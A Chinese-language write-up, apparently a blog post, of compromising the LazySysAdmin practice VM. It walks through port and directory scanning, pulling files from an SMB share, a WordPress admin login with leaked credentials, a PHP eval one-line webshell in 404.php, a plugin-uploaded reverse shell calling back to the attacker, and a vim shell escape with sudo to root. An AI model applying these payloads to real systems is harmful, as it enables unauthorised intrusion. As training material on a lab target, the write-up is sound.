靶机:LazySysAdmin

靶机:LazySysAdmin

1. 信息收集

arp-scan -I eth1 -l

d2b5ca33bd002547

–min-rate 10000 以1万的速率进行扫描

d2b5ca33bd003008

22,

80,

139,445是SMB服务

3306,

6667

nmap -sT -sV -sC -O -p22,80,139,445,3306,6667 192.168.10.12

-sT 定义TCP协议进行扫描

-sV 探测服务的版本

-sC 用默认的脚本

-O 探测操作系统版本

-p接端口号

web服务优先级靠前

d2b5ca33bd003434

d2b5ca33bd004030

gobuster 对网站目录扫描

gobuster dir -u http://192.168.10.12 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

对扫描出来的路径逐一打开

d2b5ca33bd004152

/wordpress/

d2b5ca33bd004243

/test/

d2b5ca33bd004412

/wp/

d2b5ca33bd004429

/apache/

/old/

/javascript/

d2b5ca33bd004502

/phpmyadmin/

d2b5ca33bd004524

web目前没啥太多的信息,

可以去其他服务上找找

smb服务

d2b5ca33bd005027

print$是打印机的

share$是共享的目录-最有价值

IPC$

smbclient ‘\\192.168.10.12\share$’

d2b5ca33bd005429

把有价值的都下载下来

mget *.*

d2b5ca33bd010042

再到wordpress目录里逛逛

d2b5ca33bd010303

再到Backnode_files目录看看

d2b5ca33bd010455

其他目录都是空的

d2b5ca33bd010650

好了,把有用的信息搜集起来,分析一下

d2b5ca33bd013545

d2b5ca33bd013603

在deets.txt中有一个文件12345

再看看wp-config.php

存在数据库的账号密码等信息

d2b5ca33bd013948

现在有了以下的信息
一个密码12345
一个数据库账号密码Admin:TogieMYSQL12345^^

那可以去WordPressd的后台试试看

WordPressd的后台地址是固定的http://IP/wordpress/wp-admin,除非他改动

d2b5ca33bd014148

使用Admin:TogieMYSQL12345^^可以登录!!!

d2b5ca33bd014432

到了wordpress的后台了就可以做很多操作了

比如在他的404页面写个一句话马
<?php @eval($_POST[cmd]);?>

d2b5ca33bd024844

这个404.php的路径在/wordpress/wp-content/themes/twentyfifteen/404.php

IP/wordpress/wp-content/themes/twentyfifteen/404.php
cmd

d2b5ca33bd025812

也可以考虑上传插件的漏洞利用

d2b5ca33bd014653

在https://pentestmonkey.net/tools/web-shells/php-reverse-shell上随便找一个

d2b5ca33bd014855

然后两次解压后编辑php-reverse-shell.php

d2b5ca33bd015333

只需要修改ipj就行

d2b5ca33bd0155211

然后使用Plugins的头部,填充反弹shell文件的头部。

d2b5ca33bd020407

然后kali开启监听1234端口

然后把shell.php压缩成shell.zip,并上传安装插件

d2b5ca33bd021430

/wordpress/wp-content/plugins/sh/sh.php

d2b5ca33bd020640

上次,安装

d2b5ca33bd020840

安装成功后就会给出绝对路径/var/www/html/wordpress/wp-content/plugins/shell/
IP/wordpress/wp-content/plugins/shell/shell.php

d2b5ca33bd021719

直接访问IP/wordpress/wp-content/plugins/shell/shell.php

d2b5ca33bd021821

kali这边就已经收到了反弹shell

d2b5ca33bd022003

dpkg查看是否安装了python

dpkg -l | grep python

d2b5ca33bd022207

有安装python

使用python获取完整shell

python -c “import pty;pty.spawn(‘/bin/bash’)”

d2b5ca33bd022526

清屏不支持,可以完善环境变量

export TERM=xterm-color

d2b5ca33bd022647

然后在系统里逛逛,

d2b5ca33bd022812

发现一个用户togie

没有给出密码,但是之前的文件中有一个密码是12345

可以结合起来试一试

d2b5ca33bd023044

OK,成了

但是发现命令收到限制,很难受,
使用VIM重新打开一个终端

d2b5ca33bd030225

vim
:set shell=/bin/bash
回车
:shell

d2b5ca33bd030341

接下来也OK了

d2b5ca33bd023320

这已经提权成功了,三个ALL

d2b5ca33bd023412

d2b5ca33bd023434

看一下/root目录下的文件

d2b5ca33bd023601

完结撒花!!!

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

    暂无评论内容